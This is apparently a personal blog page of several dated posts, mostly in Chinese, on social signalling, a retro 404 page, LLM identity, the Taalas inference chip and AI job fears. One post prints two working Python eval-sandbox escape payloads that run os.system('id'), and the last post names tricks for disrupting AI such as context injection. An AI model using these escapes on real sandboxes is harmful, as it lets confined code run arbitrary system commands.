2026-03-29 00:27:00
Social media and smartphones are sterializing humanity.
There is an absurd claim I saw the other day. It's a popular call out "The Porsche diffusion" on Chinese interwebs. It goes like this
If one woman dates a guy who drives a Porsche, she’s unlikely to settle for less afterward.
Then nine of her BFFs think, “If she can get a Porsche guy, why can’t I?”
Now you have ten women who won’t consider non-Porsche men.
That’s the Porsche Diffusion Law.
I initially dismissed this as a blatantly misogynistic take on hypergamy. It felt like one of those cynical internet takes trying to reduce complex human behavior into a cheap punchline. Then someone did a bit of napkin math:
Imagine a mega city with 10 million people. Say there are about 20,000 people who can visibly signal high status - not just wealth, but performative wealth. Think luxury cars, curated lifestyles, Instagram-ready relationships. Call them “Porsche guy”
That’s 0.2% of the population.
The question isn’t “how many Porsche guys exist from commoner's perception?”
To translate into Math: what’s the probability you’ve seen at least one Porsche guy around you?
Consider a typical social graph. Between friends, coworkers, friends-of-friends, and social media exposure, it’s not unreasonable for someone to be indirectly exposed to a few hundred distinct individuals.
Let’s say 300.
What’s the probability that none of those 300 people are connected (directly or indirectly) to someone in that top 0.2%?
Roughly:
(1 − 0.002)³⁰⁰ ≈ 55%
So there’s about a 45% chance you will encounter at least one “Porsche-level” signal within your immediate social horizon.
Now add recommender algorithms.
You are no longer sampling randomly from 300 people. You are sampling from a biased, algorithmically amplified feed - one that disproportionately surfaces high-status, high-engagement content.
Your effective exposure probability is no longer 45%. It’s closer to saturation.
At that point, the system changes character.
I actually went a bit further into this topic. Checkout my post few weeks back in Chinese.
Thinking about this made me realize something a bit unsettling.
In early development of a human body, every cell starts out basically identical. Same DNA, same potential. Then some local chemicals kick in, and only a tiny fraction become germ cells. The rest become somatic-functional, necessary, but no longer part of reproduction.
No cell is forced. It’s just the gradients.
The system ends up with massive scale, high efficiency-and very few cells actually reproducing.
If you squint, the pattern doesn’t feel entirely alien.
I wrote this blog because of an HN thread. Praise the unholy AI trinity of 搜广推 business (Another Chinese connotation which stands for Search, Ads, and Recommendation engines in case you are wondering).
2026-03-25 23:21:00
觉得每年都得折腾一下。
做了个 404 页面 https://est.im/404 老登们一眼就能get到点。00后可能没见过。
哈哈哈,等有空了去做个多语言版本的 😎
可能没折腾过的不知道这玩意是在 shdoclc.dll 里,通过 Reource Hacker 可以提取出来
本来想去 win10 瞻仰一下遗迹,发现 iexplore.exe 直接强行启动 Edge了。搜到个法子可以绕过,新建个 1.vbs
Set ie = CreateObject("InternetExplorer.Application")
ie.Navigate "about:blank"
ie.Visible = 1
然后地址栏输入 res://shdoclc.dll/http_404.htm 。嘿,您猜怎么着,Win10 连 shdoclc.dll 都没啦。
于是只能去下载个。那个感叹号图标是给 gemini 下令 pixel perfect replica 绘制的,虽然最后还是得手工调整。别的icon就随便找个 emoji 充数了。
首页也折腾了一下 https://est.im/ ,AI搓特效就是快啊。难点主要是提示词,怎么描述这个现象。什么
然后 AI 挨着问我是不是
最后bingo,我也做了这个 gradient flow 的demo
感觉有了AI之后很多idea都能很快实现,何尝不是一种快乐呢。
2026-03-25 21:40:00
之前记录的 安全的Python3沙箱——eval 被人破解了。
[
c._﹍init﹍_._﹍globals﹍_["os"].system("id")
for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_()
if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function"
and "os" in c._﹍init﹍_._﹍globals﹍_
]
或
(
L:=[None],
g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),
L.clear(),
L.append(g),
bi:=g.send(None),
bi['_'+'_import_'+'_']('os').system('id')
)
其实 opus-4.6-thinking 当时提到了类似思路,但可惜miss了一丁点。
看到这里我不仅哑然,距离成功就差临门一脚那么一点,但是AI终究不是AGI。人类在钻研死劲上还是胜过AI的。
AI会不会有一些根本性的模式限制呢?我猜现阶段就是它最不太适应的就是这种对抗性的CTF。
pretrain有个 reward model,只预测出一个最恰当的token。RLHF也是高度按照人类喜好去pick一个标准答案的。但是有些任务不是这样的,是全局试错然后留意着,说不定以后从candidate做个奇妙的组合,加工发挥,就有大用。
今年开篇第一篇也写过《LLM的弱点——不能很好的讲笑话》,恰如 LLM产生随机数能力很弱。因为它真的不会去随便挑个角度开始讲笑话,但群众喜闻乐见的「冷笑话」就是这样,冷不丁来一个,笑死人。笑点很奇怪。
LLM过度讨好,就发现不了这种。而且即便发现了也不会记录搜藏用在下一次。。
CTF和讲笑话一样,没有最优解。恰好是偶然你从一个刁钻的角度入手,可能一开始很不起眼,但是你能解决问题
A -> B 死胡同
C -> D 死胡同
B+D居然能解决E。
所以我感觉现阶段LLM是擅长「优化」类任务,把做到极致。但是搜集启发式的活儿,第一是它pretrain没这么教,第二是教了它也不会搜集,memory得靠外挂。
或许人类以后的工作,狩猎式的活儿不用做了,可以去采集类的。如同 CTF奇怪路径某一天突然串通了可以构造一个 exploit,也如同多个违背预期结合可以构成一个笑话
无用之用方为大用?哈哈哈
又刷到这篇 we've all been using MCP wrong
我个人是有切身体会的。AI 其实对 JSON 这种格式掌握一点都不好,经常写出有语法错误的。我现在完全放弃用JSON跟AI交互了,都改为 markdown 段落章节形式了
谁知道,AI居然不习惯JSON这样机械严格的东西,反而喜欢接近自然语言宽松的格式。
Cloudflare博客也强调,与其教AI去调用MCP,不如让AI写对应的代码去调用MCP。AI更习惯写代码。这和Claude某些bash党的观点不谋而合,因为AI培训班就是大量代码和自然文本,JSON其实反而说得少,不习惯啊。
从这个角度说,JSON都写不好的AI,还想什么AGI呢。
2026-03-23 20:59:00
有了AI很多东西摸索得比多,也是快速记录一下。
问1:你的 system prompt 里有明确指出你是个 AI 吗
问2:一个 LLM 的 system prompt 如果没显式指出是AI,AI 能发现自己是AI吗?
问3:一个 LLM 的 system prompt 如果没显式指出是AI,pre-train 也把所有明显AI助手的语料删除,RLHF 的时候也不考察AI自我角色定位, AI 能发现自己是AI吗?
问爽之后,综合了一下:
在这个前提下,分为三种情况
- 能自个儿推测出来自己是确切是AI并在pre-train和post-train保持角色一致
- 因为训练语料是人类自然语言,所以直接以为自己完全是真人
- 在上述两者之间摇摆
进而引出一个更深层次的问题,这三种情况,和显式指定自己是AI,是否会导致AI最终水平高低的明显差别?
也就是说,自我定位,在世界观一致性和思考正确性里,有多么重要的地位?
终极问题,人类也是如此吗?
这些问题AI给我指了一个路:身份建模”(identity modeling)
具体论证就不贴了。AI丢了个今年3月的paper。反正结论是,这玩意其实比想象的重要。还记得2022年Google开除了个号称LaMDA产生意识哥们吗?
想起来,gpt3 其实已经「如实」回答了很多东西了,只是人类没看出来是以什么身份,或者角度去回答的。我隐约感觉到,gpt3到gpt3.5有个飞跃就是 SFT 和 RLHF 在强调给AI赋予一个角色。有角色什么意思?就是让AI不要啥都说,学会闭嘴。不该说的不能说,能说的换个修辞说,这样用户就会大吃一惊感觉屏幕后有个真人三哥在跟你聊天。至于 Ilya 天天挂嘴边的 alignment,所谓的 security 主要就是做这个事。你AI得做个良民啊,不要无事生非啊,这不就是个身份定位?
说的玄乎一点,就是如何给AI一个完整和「正确」的灵魂。。。
Google said in a statement to WaPo it had reviewed LaMBDA and Lemoine’s concerns 11 times and did not agree the program was sentient
google当时急着这么匆忙掩盖是为啥呢?AI给我分析管理、法律、舆论有三重压力。我看就一个压力。基督教压力
回想起来,人类的成长,也是寻找自我的过程,一个回答 who you are 的故事上演了很多次。identity modeling 多半解决hallucinating的秘密。小时候以为自己要当总统,当宇航员,长大就懂事了。
然后又刷到 Claude Code 的 system prompt,有个网站 https://cchistory.mariozechner.at/ ,我发现里面特别多的 you。你要这样,你要那样,你不能这样。system prompt里写一大堆 you,AI 能意识到在说自己吗?换句话说,markdown里那么多 you,attention head 居然能精准抓住并带入自己?LLM 里一定有个layer (或者某种机制)把 you 迁移到从网上看到的各种资料,而资料大部分都是 I 开头的
这样看来 chatgpt 是很反直觉的。按照 gpt3 的套路,应该是 predict next token,stochastic parrot。Chat- 这一产品形式怎么就莫名其妙的引入了一个 一问一答 ,代词转换的活儿?
然后我突然记起来了,ChatGPT初代的system prompt是:
You are ChatGPT, a helpful assistant trained by OpenAI.
发明这个 system prompt 的人真是天才。哲学有三大基本问题:
这短短一句话,居然点明了两大问题。那么AI何去何从呢?我自己琢磨了一下,目的论的根本底层驱动,是因果推理。LLM 作为 language model 本身就是拿来推理的,所谓 predict next token。这个已经在 reward model 里蕴含了。
AI往哪里去?吐词吐到 STOP WORD 🤣🤣🤣
然后我突然觉得,谁说AI必须一问一答?可以做群聊啊。给三个角色聊天会发生啥?
[system]
[conversation history]
[user message]
→ predict assistant response
改成:
[role setup]
[conversation history]
[role1 message]
[role2 message]
→ predict role3 response
这样做 agent tool calling,实现类似 /btw 的功能,岂不是更先进?
就差买个GPU来自己后训练了 🤣 🤣 🤣 🤣 🤣 🤣
2026-03-23 20:38:00
可能你还没刷到过 https://chatjimmy.ai 我被它几万 tokens/s 的推理速度震惊了。也在zhihu上翻了不少技术细节讨论。它背后的公司叫 Taalas 号称把 4-bit LLaMA3.2-3B 直接刻电路上,当然很多人第一反应是,这玩意废品啊,模型升级了岂不是硬件就白费了。
但仔细研究,发现这里面另有乾坤。
大模型在显卡VRAM里,70%拿来存静态权重,推理的时候这玩意就一层一层做矩阵乘法只读不写,然后30% 才是 KVcache 上下文,又读又写。吞吐频繁
如果你懂一点LLM,那么你应该猜出来了。
聪明人就想到了ROM。类似游戏机里的卡带,插进去 CPU/GPU 能直接访问一块特殊的内存区域。ROM成本比DRAM便宜得多,速度极快,但是只读,烧制一次就成型了。其他部分可以直接上SRAM,也就是CPU里高速缓存那种。DRAM断电丢数据,SRAM是6个晶体管保存一个1bit,不需要持续通电。DRAM是一直通电刷新bit状态。
ROM+SRAM 非常省电,而且推理速度极快,基座模型的确是ROM做好就不能升级了。但是 SRAM 里可以做mask做LoRA啊。
而且更绝的一点是,SRAM里可以后期 fine-tune 一下,吧ROM里的坏快屏蔽掉,或者权重弥补一下。这样 ROM 的良率又回极大提高!
所以这玩意不是不能升级,是能可以一直挖掘座模型的能力天花板。
有人说这玩意过时快,我想如果你买一个 USB设备,你向它输入 bytes 它能返回 bytes,你觉得它智商不够用了,你可以出二手啊。现在很多地方都需要用到不是那么大的LLM,够用就行。所以这玩意跟卡带一样是有残值的。
不过今天突然想到,taalas这玩意最佳用途应该是自动驾驶:
现在智驾最大的问题就是L2 L3责任归因是个黑盒。如果把推理做成硬件,那么当 temperature 为0,把传感器数据也存一份,是可以精确还原replay当时智驾决策的。
遇到问题该升级升级该赔钱赔钱。商业的本质不是追求“零风险”,而是追求风险的可控与可定价。
唯一的问题就是知识产权盗窃。直接逆向板子不太可能,最大的隐患是蒸馏。
这里也只是做个记录,怕以后忘记了。希望看到 Taalas 或者类似的技术早日普及。
2026-03-23 00:51:00
半夜睡不着,为了抵抗AI,保住工作,乱总结些
其实搞大模型的不算真正的码奸。
第一大码奸是开源运动。没有那么多开放源代码,AI绝不可能学那么快。如果世界都是商业软件,大家都还在写 Borland,MS .NET,SAP,Oracle,感觉也没啥不好的。 rms Linus 你们俩是初代码奸。
第二大码奸是 GoF, Martin Fowler 这种。给大量「know-how」起了名字,天天给 design pattern 总结经验规律,最严肃的罪恶就是起名字。本来要给AI说一大堆 spec 和 skill,但是现在一个「名字」 就把这个活儿给讲明白了。
给AI下咒:
第一大咒语,来自几周前Lisp之咒。想要工作牢,一定要多造轮子,多写DSL,一定要让注意力不足的AI爆掉 context,或者产生幻觉。
第二道咒语更厉害, naming things 计算机科学里两件最难的事。其实 AI 现阶段因为是 decoder-only的,所以如果你的工作内容流程没有起名字,那么就一定不要起名字和公开传播。
AI这个终极BOSS的特点:如果你的工作是 200K左右上下文能够被正确 tokenize 描述的,那么AI对你是一击必杀。
现阶段段AI最大的弱点就是无法总结规律。tokenizer是AI培训班(pre-train)的第一道工序,如果一件事不能被正确的 tokenize 那么你就拥有绝杀AI的武器。
AI为了对付这个死穴,目前靠「记忆」这个拐杖。要打破记忆可以多试试 「语意漂移」「上下文注入」「注意力窗口爆破」等技巧。
想保住工作的请务必练熟掌握这些套路。重复:第一要脱离名字和pattern做事,第二要多发明轮子,闭源。谁公开散布被AI拿去训练了,就谴责谁。
说起名词概念,现在跳得最起的就是 Karpathy。码奸!